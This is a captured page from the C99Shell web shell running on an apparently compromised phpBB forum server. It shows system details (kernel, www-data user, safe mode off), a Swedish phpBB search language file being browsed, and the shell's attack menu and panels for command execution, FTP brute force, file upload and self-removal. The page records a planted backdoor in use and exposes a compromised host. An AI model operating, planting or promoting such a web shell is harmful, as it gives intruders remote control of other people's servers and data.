!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/language/sv/   drwxrwxr-x
Free 83.35 GB of 96.73 GB (86.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     search.php (5.55 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/** 
*
* search [Swedish] (phpBB 3.0.x)
*
* @package language
* @version $Id: search.php,v 1.21 2009/05/06 04:30:44 peetra Exp $
* @copyright (c) 2006 phpBB Group, modified and translated by Swedish translation team
* @source file is copyright (c) 2005 phpBB Group, modified and translated by Swedish translation team
* @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU Public License version 2
* @author (c) 2006-2008 Jonathan Gulbrandsen 
* Translators: Swedish translation team, working at http://www.phpbb-se.com Contact team leader at [email protected]
*
* This file is part of the Swedish language package for phpBB 3.0.x.
* Copyright (c) 2006-2008 Swedish translation team
*
* The Swedish language package for phpBB 3.0.x is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as published by the Free Software
* Foundation, version 2 of the License.
*
* The Swedish Language package for phpBB 3.0.x is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE. See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along with this language
* package. If not, see <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>.
*
*/

/**
* DO NOT CHANGE
*/
if (!defined('IN_PHPBB'))
{
   exit;
}

if (empty(
$lang) || !is_array($lang))
{
    
$lang = array();
}

// DEVELOPERS PLEASE NOTE
//
// All language files should use UTF-8 as their encoding and the files must not contain a BOM.
//
// Placeholders can now contain order information, e.g. instead of
// 'Page %s of %s' you can (and should) write 'Page %1$s of %2$s', this allows
// translators to re-order the output of data while ensuring it remains correct
//
// You do not need this where single placeholders are used, e.g. 'Message %d' is fine
// equally where a string contains only two placeholders which are used to wrap text
// in a url you again do not need to specify an order e.g., 'Click %sHERE%s' is fine

$lang array_merge($lang, array(
    
'ALL_AVAILABLE'            => 'Alla tillgängliga',
    
'ALL_RESULTS'            => 'Visa alla resultat',
    
'DISPLAY_RESULTS'        => 'Visa resultat som',
    
'FOUND_SEARCH_MATCH'        => '%d träff',
    
'FOUND_SEARCH_MATCHES'        => '%d träffar',
    
'FOUND_MORE_SEARCH_MATCHES'    => 'Fler än %d träffar',
    
'GLOBAL'                => 'Globalt anslag',
    
'IGNORED_TERMS'            => 'ignorerat',
    
'IGNORED_TERMS_EXPLAIN'    => 'Följande ord i din sökfråga ignorerades eftersom de är för vanliga: <strong>%s</strong>.',
     
'JUMP_TO_POST'            => 'Gå till inlägg',
    
'LOGIN_EXPLAIN_EGOSEARCH'    => 'Forumet kräver att du registrerar dig och loggar in för att visa dina egna inlägg.',    
    
'MAX_NUM_SEARCH_KEYWORDS_REFINE'    => 'Du har angett för många olika nyckelord. Var god försök på nytt med maximalt %1$d ord.',

    
'NO_KEYWORDS'            => 'Du måste ange minst ett ord att söka efter. Varje ord måste bestå av minst %d tecken och inte mer än %d tecken, exklusive jokertecken.',
    
'NO_RECENT_SEARCHES'    => 'Inga sökningar har gjorts nyligen.',
    
'NO_SEARCH'                => 'Du har inte tillåtelse att använda söksystemet.',
    
'NO_SEARCH_RESULTS'        => 'Inga träffar hittades.',
    
'NO_SEARCH_TIME'        => 'Du kan inte söka just nu. Försök igen om några minuter.',
    
'WORD_IN_NO_POST'        => 'Inga inlägg hittades eftersom ordet <strong>%s</strong> inte finns i något inlägg.',
    
'WORDS_IN_NO_POST'        => 'Inga inlägg hittades eftersom orden <strong>%s</strong> inte finns i något inlägg.',
    
'POST_CHARACTERS'        => 'tecknen av inlägget',
    
'RECENT_SEARCHES'        => 'Senaste sökningarna',
    
'RESULT_DAYS'            => 'Begränsa resultaten till inlägg nyare än',
    
'RESULT_SORT'            => 'Sortera resultat efter',
    
'RETURN_FIRST'            => 'Skriv ut första',
    
'RETURN_TO_SEARCH_ADV'    => 'Återgå till avancerad sökning',

    
'SEARCHED_FOR'                => 'Sökterm använd',
    
'SEARCHED_TOPIC'            => 'Sökte inom tråd',
    
'SEARCH_ALL_TERMS'            => 'Sök efter resultat som matchar alla termer eller använd frågan som den är angiven',
    
'SEARCH_ANY_TERMS'            => 'Sök efter resultat som matchar någon av termerna',
    
'SEARCH_AUTHOR'                => 'Sök efter författare',
    
'SEARCH_AUTHOR_EXPLAIN'        => 'Använd * som jokertecken för partiella träffar.',
    
'SEARCH_FIRST_POST'            => 'Endast första inlägget i trådar',
    
'SEARCH_FORUMS'                => 'Sök i kategori',
    
'SEARCH_FORUMS_EXPLAIN'        => 'Välj den kategori eller de kategorier som du vill söka i. Underkategorier söks igenom automatiskt om du inte inaktiverar “Sök i underkategorier” nedan.',
    
'SEARCH_IN_RESULTS'            => 'Sök bland dessa resultat',
    
'SEARCH_KEYWORDS_EXPLAIN'    => 'Sätt <strong>+</strong> framför de ord som måste finnas med i resultaten och <strong>-</strong> framför de ord som inte får finnas med i resultaten. Skriv en lista med ord separerade med <strong>|</strong> i en parantes om endast ett av orden måste finnas med i resultaten, t.ex. <em>(ord|ord)</em>. Använd * som jokertecken för partiella träffar.',
    
'SEARCH_MSG_ONLY'            => 'Endast meddelandetext',
    
'SEARCH_OPTIONS'            => 'Sökalternativ',
    
'SEARCH_QUERY'                => 'Sökfråga',
    
'SEARCH_SUBFORUMS'            => 'Sök i underkategorier',
    
'SEARCH_TITLE_MSG'            => 'Inläggsämnen och meddelandetext',
    
'SEARCH_TITLE_ONLY'            => 'Endast trådämnen',
    
'SEARCH_WITHIN'                => 'Sök inom',
    
'SORT_ASCENDING'            => 'Stigande',
    
'SORT_AUTHOR'                => 'Författare',
    
'SORT_DESCENDING'            => 'Fallande',
    
'SORT_FORUM'                => 'Kategori',
    
'SORT_POST_SUBJECT'            => 'Inläggämne',
    
'SORT_TIME'                    => 'Datum',
    
'TOO_FEW_AUTHOR_CHARS'    => 'Du måste ange minst %d tecken av författarens namn.',
));

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0029 ]--